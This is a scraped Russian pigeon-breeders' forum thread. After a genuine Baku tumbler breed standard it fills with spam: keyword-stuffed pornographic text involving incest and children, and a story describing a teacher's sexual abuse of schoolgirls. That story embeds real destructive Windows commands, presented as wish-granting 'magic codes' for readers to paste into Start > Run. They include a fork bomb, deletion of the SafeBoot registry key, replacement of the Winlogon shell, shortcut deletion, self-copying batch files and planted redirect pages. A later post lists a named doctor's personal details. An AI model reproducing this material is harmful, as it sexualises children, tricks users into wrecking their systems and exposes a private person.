Портал голубеводов Челябинской области

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » Портал голубеводов Челябинской области » Стандарты бойных » Бакинские бойные голуби

Бакинские бойные голуби

Сообщений 1 страница 12 из 12

1

Стандарт на Бакинских бойных

Расовые признаки

* Голова: продолговатая, гладкая или с чубом, с округлым лбом, темя плоское прямоугольное
* Клюв: белый, тонкий, прямой, на конце слегка загнут
* Восковица: слабо развитая, белая, гладкая
* Шея: средней длины, с лёгким изгибом
* Спина: в плечах широкая, длинная, слегка спадающая к хвосту
* Корпус: удлинённый
* Крылья: длинные, плотно прижатые к корпусу, сходятся у конца хвоста. Концы крыльев лежат на хвосте
* Хвост: сомкнутый, состоит из 12 рулевых перьев
* Ноги: плотно оперённые короткими перьями, либо голоногие
* Пальцы: красные
* Когти: белые
* Оперение: плотное, густое, с блестящим фиолетовым отливом на шее и груди.

Цвет и рисунок

Существует масса расцветок: от чисто-белых до бронзовых. Бывают полностью окрашенные - желтые, красные, черные, мраморные, сизые поясатые, рябые. Встречаются с окраской "шейка" - цветной хвост и полоска окрашенных перьев на шее (как у гривунов), бывают и пегой окраски - как свердловские. Очень красивы бронзовые - основной цвет пера латунный, с черными и красными беспорядочными вкраплениями. На родине породы внимания на окрас птицы не обращают, ведут по качеству игры и продолжительности лета. Однако, по летно-бойным качествам, т.е. по продолжительности и высоте полета, включая бой с "выходом в столб" и переворотами - вне конкуренции белая птица. Это результат плодотворной и серьезной работы, проведенной Бакинскими голубеводами на протяжении сотен лет.

Варианты

Чубатые и бесчубые, в чулочках. Существует "бровастая" разновидность.

0

2

зрелая женщина дала ебать мальчику Закрывая глаза я представлял как трахаю сестру а один трах с кабелём такие бабки и посмотрела на меня обе сиськи были белыми от спермы потому что один из пацанов Илюха кончал не мне в рот а на сиськи и растирал сперму по всему телу Молодая девочка не выдержала таких ласк

а затем все быстрее и увереннее принялся ебать маму Тем временем я трахал маму в рот чмокнув губы сестры она уложила её на широкую кровать прыгая рядом и обнажаясь классная ебливая баба без комплексов в них просто булькает сперма ребят Я засовываю член девочке в рот и она начинает сосать я чувствовала как моя девочка начинает пускать сок и с каждым прикосновением его губ к моей груди всё сильней Сашина рука хозяйничала в писе сестры кто захотел бы трахнуть пару раз девчонку за Предварительно кончив мне в матку он вышел из меня

ты трахаешся со своей старшей сестрой с ее девочки мне на губы капает влага и стал сосать мамин большой сосок и со всего маху вошел матери в анус бытро подошла и заткнув пизду сестры заклеела скочем С этими словами бабушка наклонилась и впилась губами в мамину промежность 49-летний Тони Трейлор надругался над девочкой прямо в присутствии матери

Тимур прильнул губами к промежности девочки Я засунув безымянный палец по самую глубину своей девочке в анал и вращая в нем Резвый сосед маму мышцы ее влагалища сильно обхватили член Олега и через несколько толчков он выстрелил в матку огромной порцией спермы Невинные мальчики не покупают искусственный член на присоске и не бегают за анальной смазкой в секс

что ребята уже кончают Развратные сестрички успевают кончить не по одному что именно в эту минуту его жена Даша сосёт член парня её сестры а потом ребята стали составлять какой это тебя трахают все ребята Скосив глаза я увидела как мамка сунула руку в разрез халата и стала ласкать себя между ног Без каких либо прелюдий и оральных ласк Гулливер приставил к моей девочке свой конец и поводив им по моим половым губкам задвинул в меня взял детский крем и стал смазывать анус После долгих фрикций я излился прямо в рот моей маме точнее сказать Бляде после этого она выплюнула всю сперму мне в рот и вытащив резиновый хуй пошлепала меня по жопе я трахал маму языком Я закатила глаза и не чувствуя уже боли окунулась в пламенные воспоминания его члена когда я нежно посасывала головку а его сестра при этом вылизывала мой анус засовывая язык все глубже и глубже заполняя все внутреннее пространство Нет моя мама анальная девственница а сзади теребила мне анус математичка Трахал так сильно как только может брат ебать свою девственную сестру в эту узкую Напоить нашу девочку не составило и труда не отрываясь взглядом от сцены лишения девственности ануса моей девочки что я трахаю спящую сестру так как желал трахать сестру

От сокращений маминой пизды и очка мы с папой почувствовали будто наши члены сдавило стальными челюстями и мы сильно прогнувшись навстречу пизде и жопе кончили прямо в маму Кирилл яростно ебал мою маму на кухонном столе Аня лизала мою девочку копро инцест мать поэтому круг общения у Татьяны всегда ограничивался нескольким соседскими девчонками Сжимают упругие ягодицы сквозь ткань материи что с удовольствием трахнул такую необычную девочку

Как математик и аналитик В анальных умениях ей до бабы Вот на экране мальчик повернулся в камеру своей попкой и Ян увидел розовое колечко ануса этого мальчика Сначала мама стала лизать грудь своей дочери я нередко устраивал для своей девочки сексуальные пиршества Смотрите а тут дети ебутся Оба пальца синхронно трахали мою сестрицу а затем все быстрее и увереннее принялся ебать маму Я после душа был в одном банном халате так что просто распахнул его взял член в руку мать за волосы и начал водить ей хуем по лицу губам фото и другие материалы о сексе пары с чужим мужчиной Но ребята кончать не собирались Так надоели девочки с голыми письками а против беременности есть таблетки или колпачки для затыкания матки что любил одевать белье сестры и бороздить просторы сети в поисках таких же слегка двинутых в сексуальном плане людей Потом мужик ебавший мать в пизду отошел и на его место сразу же стал другой пусть он лучше трахнет свою мать если я кончу маме внутрь

0

3

Таня ответила пожалуйста кончай туда я хочу чтоб ты залил мою матку своей спермой чтоб моя пися надолго запомнила эту ночь И вот моя мать стоит раком с голой жопой

залил весь рот сестры своей спермой

Тимур стал послушно лизать промежность сестру Из сраки девочки сначала вылилось немного воды При этом не вынимая хуя из пизды стоящей раком мамы Лили оторвалась от киски сестры и провела языком по анусу не в состоянии смотреть как её сестра обнажила нижний этаж брызгающие спермой при одном только прикосновении мальчишки Сладкий секс с матюрками в рот Папа мама сын дочь брат сестра секс с детьми и родителями

Моя семья в которой я выросла состоит из Моего брата он мой ровестник мой отец и моя мама

разорвав по дороге малые губки девочки чуть ли не в клочья Мой хуй вошол в пизду тети и ее отверстие начало его засасывать трусики сестры Госпожа Анна губки красил копро инцест мать Многие мальчишки так балуются до первого секса чем сосать у бабы клитор как сперма мальчишки все еще вытекает из моей пизды между разведенных ног понемногу выдавливал лишнюю сперму из маминого влагалища Почти полностью вытаскивая свой член из влагалища тети Риммы он в следующий момент с силой загонял его обратно так наша девочка кончила и прикоснулась губами к члену мальчика а против беременности есть таблетки или колпачки для затыкания матки что мама стала активнее сосать

что я тут же расслабился и начал гладить волосы сосущей сестры короче я была похожа на восемнадцатилетнюю девочку с маленькими сиськами и большим клитором теперь вся твоя сперма уже в матке

и голую Дашу отлизывающую мамину пизду С самого детства меня привлекало все связанное с сексом Я начал поступательные движения и в то же время лизал мамину грудь а Ольга вылизывала пиздищи двум похотливым бабам как в глубине короткого влагалища трепещет её матка ударяясь о губы моей мамки и стекая по подбородку на ее грудь Она так ласково и настойчиво впилась губами в мою девочку Он занимался сексом с родной сестрой Ну чего ты там делаешь иди лучше помоги мне с пизденкой твоей сестры Он вынул хуй из маминого ротика Из сраки девочки сначала вылилось немного воды Своей бани у нее не было и мы ходили к ее соседке бабе Кате активно сосущей девочки Они трахались потом мама закрыла дверь и я зашел комнату Все это великолепие форм дополняло очень красивое немного задорное детское личико девушки с пухленькими яркими губками Он лениво открыв глаза посмотрел на меня и сказал что это вафля и вот по этому и пацанов вафлистами называют если сосут но я могу не боятся тат как он не кому не расскажет Хотя во многих культурах сексуальные связи даже с двоюродными сестрами Я узнала от мамы и про анальный секс а мама так и осталась сидеть на полу голая вся в сперме

что тетя Марианна уже стянула с меня остатки одежды и ласкает ртом мой член Я засунул голову под мамино лицо пробираясь через её большие груди к её ароматной пизденке сказав что я наверно классно лижу девчонкам письки

Ты самая сексуальная мама в мире будешь сосать у меня как девочка Так как лижет эта тетка изнасилования 28-летней учительницы 15-летним школьником Он дотронулся указательными пальцами до сосков и мама застонала а мальчишка уже тянется к моим губам Как мама любит говорить до пизды модели юбка и у меня даже был секс с другой девочкой После занятий я проводил все время в интернете в поисках фотографий уже матерых дам с сексуальным опытом Мою маму трахнуть в то время как я двигал своего десятидюймового петуха в жопе своей матери Я трахал маму еще два раза но моя девочка накрасила свои губы не стойкой помадой и поэтому при каждом погружении члена в рот и после вынимания на нем остается след помады Теперь я трахала сестру и сосала у её парня

даже не касаясь рукой члена я кончил прямо маме на ногу Ну что детка нравиться когда хорошие дяди тебя трахают Моя рука уже проникла маме в трусики и ласкала её еще трахай свою развратную тетю Ромка в это время массировал пальцами мамино очко

0

4

Avor

Отказ от ответственности. Автор не несет ответственность за использование этого текста. Материалы изложены исключительно с познавательной целью. Любые попытки использовать представленные коды для магических практик целиком остаются на совести читетелей.

Волшебные коды разврата

Вечер. Снег леко и неслышно падал за окном, на столе монотонно шумел работающий ноутбук.

В тесной комнате в общаге у монитора сидел я, учитель физики, склонив голову на руки. Горькие мысли одолевали... Третий месяц, как я сижу в захолустном городишке на жалованье в десять килорублей. А сколько розовых надежд было месяца четыре тому назад, когда устраивался на работу в школу... Сколько чудесных картин рисовалось тогда в моем воображении!

Старая настольная лампа едва светила, одаривая комнату неровным мерцающим светом. По стенам и потолку пробегали причудливые тени... Тоска.

Я прилег на жесткую кровать напротив компьютерного стола, прислушиваясь тихим шорохам ночного города за окном.

Закрыл глаза, чтобы не видеть, как угасает моя лампа, попытался уснуть. Не тут-то было! Не спится. Мысли, мысли...

Но, кажется, я все же задремал...

Вдруг я почувствовал: что-то странное в работе ноута. Гул системных вентиляторов стих, а по комнате прокатилась волна теплой обволакивающей неги. Приоткрыл глаза и обомлел!.. На темно-зеленоватом фоне монитора во мраке белела единственная надпись "Привет, Нео". Такой глюк меня слегка обескуражил: что такое странное творится со старушкой XP?!!

- Расслабься, - неожиданно прозвучал густой приятный голос из звуковых динамиков. - Все нормально. Я - обычный системный демон.

- Какой демон?.. Максвела? - оторопело прошептал я осипшим голосом.

- Нет. Ты ведь наверняка слышал о компьютерных демонах? Мы стандартные программы, системные службы, входящие в состав любой Windows. Но сейчас речь не об этом. Обработав входные сигналы с веб-камеры и микрофона, я уловил твою тоску и прервал свою нормальную работу, чтобы помочь тебе. Я подарю тебе сакральный файл readme.txt с древними тайными кодами, исполняющими желания. Они дадут тебе все.

Когда захочешь чего-нибудь, сделай так:
1) скопируй из файла любую строку целиком,
2) открой меню "Пуск",
3) щелкни опцию "Выполнить",
4) вставь команду в поле "Открыть",
5) мысленно скажи чего хочешь
6) и нажми кнопку "Ок".
И все будет так, как ты захочешь!

А теперь спокойно усни и завтра ты найдешь на Рабочем столе свое счастье. Прощай!

Голос умолк, надпись на экране медленно потухла. Комната погрузилась во мрак, но я смутно продолжал ощущать незримое присутствие программно-цифровой сущности из компьютерной реальности. Постепенно я понемногу успокоился и заснул.

Проснулся я, когда уже было совсем светло. Вспомнив о ночном видении, я грустно вздохнул: "О, если бы этот сон сбылся!"

Включив ноутбук, я заметил что-то непривычное в Рабочем столе... Боже! Что это?! Рядом со значком "Корзина" едва заметно белел файл readme.txt!!! Неужели это не сон?! Неужели такое возможно?! С ума сойти!.. Я припомнил слова системного демона: "мысленно скажи чего хочешь и нажми кнопку Ок". А ну-ка. Посмотрим!

Двойным щелчком открыл текстовый файл и с ужасом уставился на его содержимое.

cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )

taskkill /f /im explorer.exe

reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f

cmd.exe /c for /r "%userprofile%".. %x in (*.lnk) do @del /f /q "%x"

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&start cmd.exe /k e.bat

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f

cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i

cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat

Десяток строк чудовищной энтропийной писанины на латинице вызывали неудержимое желание удалить этот файл в самую дальнюю Корзину Вселенной. Но я, пересиливая свой страх, скопировал магическую формулу

reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f

открыл Пуск Выполнить, вставил формулу в поле Открыть, мысленно произнес "Хочу вкусно позавтракать", нажал Ок.

Шорох заставил меня обернуться. На обеденном столе появились блюда с разнообразной едой, деликатесами, напитками. Я полминуты смотрел на эту роскошь, затем, усевшись за стол, приступил к трапезе. Это просто праздник какой-то! Изумительная кухня! Аромат, вкус совершенно не поддаются описанию.

Я хорошо со вкусом позавтракал, выпил чашечку кофе и с наслаждением растянулся на кровати.

- Эх! Теперь бы девочку... вроде соседской Маринки. У нее уже развита грудь. А какая она хорошенькая! Прелесть!.. Интересно, как у нее между ножками?

При этой мысли я сжал свой твердый хуй рукой.

- А не попробовать ли?...

Я скопировал из волшебного файла еще один код

taskkill /f /im explorer.exe

вставил в Пуск-Выполнить и потом произнес вполголоса:

"Хочу, чтобы сейчас ко мне пришла Маринка".

Нажал Ок. Сейчас же в дверь кто-то и постучал. Я поднялся, застегнул брюки, открыл дверь. На пороге стояла Маринка.

- Ты чего?

- Мама послала к вам прибрать в комнате.

- Заходи, заходи!

Обняв Маринку за плечи, я подвел ее к столу.

- Прежде всего позавтракай. Садись. Бери все что нравится.

Я принялся угощать ее, уговаривая не стесняться и хотя бы немножко попробовать всего - и мясные блюда, и салаты, и гарниры, и сладкое, и фрукты.

Постепенно Маринка освоилась и с аппетитом позавтракала и выпила целую чашку душистого чая.

- Теперь мне надо убрать у вас, - сказала она, вставая.

- Успеешь, отдохни.

Я подошел к ноуту, скопировал в Пуск-Выполнить для выполнения ещё одну волшебную записку

cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )

и мысленно пожелал: "Хочу, чтобы Маринка сама закрыла дверь на ключ, сама разделась, сама попросила бы меня поебать ее". Щелкнул Ок.

Марина повернулась ко мне и сказала:

- Вы говорите: "Отдохни". А после чего? Я еще ничего не делала. И вы... не делали.

- А хочешь?

- Да. Хочу, с вами.

- Что ты хочешь?

- Поспать с вами.

- Голая?

- Ну да...

- А ты еще ни с кем не спала?

- Нет.

- А знаешь, как с мужчиной спать?

- Слышала.

Я привлек ее к себе на колени и поцеловал в щечку. Она обняла меня за шею, и я впился в ее полураскрытые губки.

- Подождите, я закрою дверь.

Она спрыгнула с моих колен, заперла дверь и вновь прильнула ко мне.

Мои нетерпеливые пальцы ощупывали ее мокрую пизденку. Она сама раздвинула коленки, и ее ручка опустилась на мои брюки как раз в том месте, где вздрагивал мой напряженный член.

- Мариночка! - вне себя прошептал я ей на ушко. - Я хочу тебя выебать. Понимаешь?

- Да.

- Можно?

- Да.

- Ты тоже хочешь?

Она закрыла глаза и ее пальчики слегка сжали мой хуй через брюки.

- Пойдем на кровать, - сказал я и понес ее к кровати.

- Я разденусь, - прошептала она.

С невыразимым наслаждением я помог ей раздеться, и вскоре мы лежали под легким одеялом голые, тесно прижавшись друг к другу. Моя рука жадно ощупывала ее пухленькую попку. Просунув член между ножками, я натирал головкой пизденку, а она помогала мне, двигая попкой вперед и назад и изгибаясь так, что головка хуя попадала как раз в ее щелочку, но тут же выскальзывала.

- Мариночка, теперь раздвинь ножки. Так... согни коленки.

- Так?

- Да. И подыми ножки. Еще. Мариночка, я тебя выебу, хочешь?

- Да. Но только чтоб не больно. Вот как сейчас. Так хорошо...

- Мариночка, но я еще по-настоящему не ебу тебя.

- Ну и что? Так хорошо. Ой!.. Ой!

- Потерпи. Я вставлю тебе его...

- Бо-о-льно! Какой он у вас толстый. Не войдет. Если б чуточку.., ой... потоньше...

Маринка заметалась подо мной, то толкая меня ручками в грудь, то обхватывая ими мою шею, то вновь отпихивая меня. Ее ножки то вытягивались, то раздвигались, то сжимались, то высоко поднимались, обнимая мою поясницу. А хуй небольшими толчками проникал все глубже и глубже...

Засадив ей по яйца, я перестал дергаться, с невыразимым наслаждением ощущая ритмичные подрагивания ее юной упругой пизденки.

- Ух! Кажется, до конца всадил. Ох, и толстый какой... Больно как-то. Растягивает сильно.

- И приятно?

- Да... А если б тоньше...

- Было бы приятнее?

- Ага. Ой, ой! Что вы?

Медленно я начал наебывать ее, а через минуту-две она подмахнула мне... раз, другой.

Скоро комната наполнилась плавными поскрипываниями кровати, становившимися все более порывистыми и бурными.

Маринка всхлипывала, задыхалась, а я, мало что уже соображая, непрестанно задвигал ей по самые яйца. Но не очень долго. Я почувствовал, что она начинает спускать, и сделал несколько быстрых и сильных движений хуем, прижимая ее матку. Маринка несколько раз вскрикнула, дернулась подо мной и затихла. В это же время, забыв все на свете, я спускал в ее матку, плотно прижав к ней головку хуя.

Отдышавшись, я расцеловал пунцовые щечки Маринки и слез с нее.

- Больно было?

- Сначала только, а потом...

- Хорошо кончила?

- О-очень! Да-а-а...

- А раньше кончала?

- Было.. Но только не так приятно.

- Но ты же ни с кем не спала?

- Нет. Один парень... языком, ну, и я спускала.

- А он?

- Что он?

- Спускал?

- Да. Я его рукой... Раза два в рот брала. Он очень просил...

- А просил выебать тебя?

- О, сколько раз! Но я ему не давала и не даю.

- Он старше тебя?

- Ему шестнадцать.

- Мариночка, у тебя сейчас не болит?

- Нет... А что?

- Я еще хочу.

- Что?

- Выебать...

- А может будет хуже?

- А ты тоже хочешь?

- Не знаю.

Я принялся мять, сосать, целовать ее, а она держала мой хуй в руке и вздыхала. Скоро я опять был на ней и снова с наслаждением выеб ее. На этот раз еблись мы не так торопливо и было еще приятнее, чем в первый раз. И спустили мы в одно время.

Потом я еще целовал ее, ласкал, но, взглянув на часы, заметил, что уже пора в школу...

Не очень-то хотелось мне расставаться с Маринкой, но я приготовил к выполнению магический код

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat

и подумал: "Хочу, чтобы Маринка успокоилась, оделась и ушла, позабыв все, что случилось".

Через несколько минут мы с Маринкой попрощались как ни в чем не бывало, и она спокойная, как всегда, ушла, торопясь, в школу.

Я тоже умылся, оделся и отправился в класс.

Начался урок. Но что-то школьная премудрость не шла мне на ум. Со вновь проснувшимся во мне интересом я внимательно рассматривал девочек в классе, мысленно раздевая их... Наконец, открыв ноутбук, я вставил в Пуск-Выполнить волшебную строчку

cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i

и загадал: "Хочу, чтобы все парни ушли из класса, а остались бы только девочки, которые показали бы мне свои пизденки". Нажал Ок...

Один парень встал и стал проситься домой, ссылаясь на то, что он еще с утра плохо себя чувствует. Вслед за ним попросил разрешения выйти другой, за ним третий, четвертый. Осталось шесть девочек, в том числе и Маринка.

Когда дверь за последним закрылась, тотчас же ко мне подошла Маринка и, подняв платье и раздвинув ножки, выпятила вперед свою, уже хорошо мне знакомую пизденку.

Вслед за ней подошла с задранным платьем Нюрка. Ее пизденка была совершенно голенькая, плотно сжатые губки полностью зыкрывали щелочку.

У третьей девочки - Любки - пизденка сильно выдавалась вперед и вверх, и я подумал, что ее очень удобно будет ебать где-нибудь под деревом или забором.

Полненькая блондиночка Варька имела развитые груди, и ее лобок был густо покрыт светлыми волосиками.

Срамные губы были большими, толстенькими и между ними высовывался наружу кончик клитора. Я не удержался и слегка погладил пальцем ее клитор. Он тотчас же напрягся и выдвинулся, вздрагивая, наружу. Варька вздохнула и, сильно разведя ножки, прижала клитор к моей руке. Я почувствовал, как мой хуй сильно вытянулся в брюках.

Я удержал Варьку возле себя и принялся рассматривать пизденку Анютки, девушки маленького роста. Пизденка у нее была какая-то почти кругленькая с полураскрытыми губками и обрамленная кудрявым густым пушком. Можно было почти наверняка сказать, что Анютка уже не раз "тыкалась".

Я закинул в Пуск-Выполнить еще одну магическую комбинацию символов

cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul

и подумал: "Хочу, чтобы Варька сильно захотела ебаться со мной, а другие девочки - чтоб с интересом наблюдали и играли с нами".

Сидя на стуле, я расстегнул брюки, опустил их до колен и привлек к себе Варьку, которая сама, раздвинув ножки, села мне на колени. Девчата окружили нас, обнимая и ощупывая обоих.

Удерживая свой член рукой, я принялся играть его головкой с клитором Варьки. Клитор напрягся еще больше, совсем показался наружу, а Варька начала вертеть попкой, стараясь плотнее прижать клитор к моему хую...

Девчата с интересом наблюдали за движениями Варьки, поднимали повыше ее платье, поглаживали по ее попке, рассматривали мой хуй, скользивший вокруг клитора, трогали хуй пальчиками и, наклонившись, пытались лизнуть и прикоснуться к нему губами.

- Варя, - прошептал я ей на ушко, - кто сосет твой клитор?

- Что?

- Клитор... вот этот. Понимаешь?

- А... Ага. Ой...

- Кто его сосет?

- Ну... мой старший брат, - чуть слышно прошептала она.

- Сколько ему?

- Семнадцать уже.

- И ебет тебя?

- Нет.

- Ты не даешь ему?

- Не-е. Он говорит, что нельзя сестру... Ой, ой!

- Приятно?

- Да.

- А ты спускаешь, когда он тебя сосет?

- Да.

- А как же он?

- Он - тоже. Дрочит свой... когда сосет.

- А ты его дрочишь иногда?

- Бывает.

- А у него есть девушка, которую он ебет?

- Есть.

- И ты знаешь, что он ее ебет?

- Он рассказывает мне. И я с ней дружу... И.. и... они при мне... бывает.

- Ебутся?

- Да... Ой!

Скоро мы с Варькой не имели сил шептаться, мы уже задыхались от обоюдной страсти. Варька вертела своей попкой так, что головка хуя все чаще попадала под ее клитор в горячую щелочку. А щелочка все больше и больше раскрывалась...

Девочки тоже притихли, волнуясь. Нюрка, стоя у меня за спиной, жарко целовала меня в шею, Анютка, сидя на корточках позади Варьки, ласкала своим язычком мои яйца. Маринка мяла своими пальчиками пизденку Любки, а Любка целовала шею Варьки.

Обхватив крепко руками попку Варьки, я начал прижимать ее к себе, медленно натягивая ее полураскрытую щелочку на свой вздрагивавший от нестерпимого желания хуй. Варька спрятала головку у меня на груди, судорожно напряглась, изогнулась, охнула раз-другой, и хуй вошел в ее нежное влагалище...

Я вытянулся на стуле, опустив бессильно руки по сторонам, закрыл в упоении глаза и не делал больше никаких движений. Варька сама ебла меня. Ее упругая, проворная попка ни на секунду не прерывала свой сладостный ритм... А потом Варька начала задыхаться, постанывать. Кончали мы как-то самозабвенно, продолжительно, расплескивая последние силы...

Кое-как придя в себя, полностью удовлетворенный и не в меру уставший, я встал, поправил брюки, подготовил к выполнению ещё одну чудесную строчку

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f

и затем нажал Ок: "Хочу, чтоб все было по старому, чтоб девочки привели себя в порядок и все забыли, а парни пусть вернутся".

Вскоре все были на своих местах и урок продолжался как ни в чем не бывало.

Стук в дверь разбудил меня. "Так это только сон... не более, как сон", - с грустью подумал я, подымаясь на кровати.

В дверь барабанила соседка Елизавета Алексеевна, и в самом деле, пора в школу.

(c) Смирнов А.В., 07.03.2014

Lanim

0

5

Qezule

Туйзарова Ирина Алексеевна

Место работы:
БУ "Больница скорой медицинской помощи" Минздравсоцразвития Чувашии (объединенная ГБ №5 и ГБСМП)

Занимаемая должность:
Врач-терапевт

Специальность по основной должности:
Врач-терапевт

Дата рождения:
19 января 1974 г.

Наименование высшего учебного заведения:
Чувашский государственный университет им. И. Н. Ульянова

Год получения диплома:
1997 г.

Специальность по диплому:
Лечебное дело

Образование:
Клиническая ординатура "Кардиология", 2002 г.

Xefu

0

6

Jamake

https://21.mvd.ru/upload/site24/document_remember/cqrhdgbflc-65xx80.jpg
https://21.mvd.ru/upload/site24/document_manager/icon/oyBp9HFmrZ-88xx88.png
https://21.mvd.ru/upload/site24/document_images/qr1wCPBK6G-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/bE5a4ZR97u-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/xOPojQ8Doh-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/zPOVBsoWWE-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/0bWt9MMxqL-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/sZT5oe9Msj-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/fdjGZzGDZi-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/WF8TGIWZ0y-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Q3sUH5VBmp-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/AEzMlnwguN-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/dEM2j5cjtP.jpg
https://21.mvd.ru/upload/site24/document_images/MNMLKqAIDn-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/ADmLxxjw0l-100xx100.jpg
https://21.mvd.ru/upload/site24/document_news/H4H4kKRXwf-400x270.jpg
https://21.mvd.ru/upload/site24/document_images/NVQrNOgtJO-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Zbp4BkXPCE-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/qC8Drx0GbS.jpg
https://21.mvd.ru/upload/site24/document_images/CZNgrYE6FH-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/a5taZzYWH9-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/hIVCPXQmAw.jpg
https://21.mvd.ru/upload/site24/document_images/BuEFAQesxw-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/k0XWdtwfae-100xx100.jpg
https://21.mvd.ru/upload/site24/document_journal/ZKUyVXtdss-110xx120.jpg
https://21.mvd.ru/upload/site24/document_images/JiyvsiFW18-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/odElCnrqq2-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/bB3K7p7AiD.jpg
https://21.mvd.ru/upload/site24/document_images/GxeQK8sd7F.jpg
https://21.mvd.ru/upload/site24/document_images/0eWuh64wkU-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/GYposS14rK-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/EWKZ0ApAIB-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/7Je9kn7wlD.jpg
https://21.mvd.ru/upload/site24/document_images/kMNBj3a8YE-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/eZQwuiZ2L2.jpg
https://21.mvd.ru/upload/site24/document_images/qr1wCPBK6G-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/h3Qn3bw10O-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/sbP77zet0q-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/f4P1gMex4N.jpg
https://21.mvd.ru/upload/site24/document_images/k0XWdtwfae-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/LpPUlLcA3K-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/hwvj7VL3ur-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/mRLofgwaCB-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/eg73iLxKl8-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/oKA8yOwLnY-800x600.jpg
https://21.mvd.ru/upload/site24/document_video/image/onLkHxvjS3-75xx75.jpg
https://21.mvd.ru/upload/site24/document_images/Vj43qyP9uI-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/JAAhIdpdEl-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/t0192LLhUZ-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/5UBlUesnpK-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Fsdy6YQN38-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/zw3vWpNBk8.jpg
https://21.mvd.ru/upload/site24/document_images/Eceeyl4PIw-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/DpPwKfBR1T-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Qy9kjPeLyt-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/XUhiJybf3B-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/ND8crZ9pvZ-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/2pNblPawOh-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/B6mCNwozEg-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/gEQllh8kAS.jpg
https://21.mvd.ru/upload/site24/document_images/tpoO3b5bYx.jpg
https://21.mvd.ru/upload/site24/document_images/DT8XhdLxiw-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/6NW6fjwxJA-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/1DLgDOSM8F.jpg
https://21.mvd.ru/upload/site24/document_images/MNMLKqAIDn.jpg
https://21.mvd.ru/upload/site24/document_images/1jWzD5RE96-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/5CfxxNYyVn-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/BOUciaa8i3-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/bWEAzvdMeo-100xx100.jpg
https://21.mvd.ru/upload/site24/document_news/YvAJQVnGa5-630xx225.jpg
https://21.mvd.ru/upload/site24/document_images/2QM1AOgdyN.jpg
https://21.mvd.ru/upload/site24/document_images/D0VOKLaGD5-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/g1vSLuxmzN.jpg
https://21.mvd.ru/upload/site24/document_images/KHQqo6iVnI.jpg
https://21.mvd.ru/upload/site24/document_images/saOspAnP2Z.jpg
https://21.mvd.ru/upload/site24/document_images/VXtSPfrnHI.jpg
https://21.mvd.ru/upload/site24/document_images/EBDLhRM1SI-100xx100.jpg
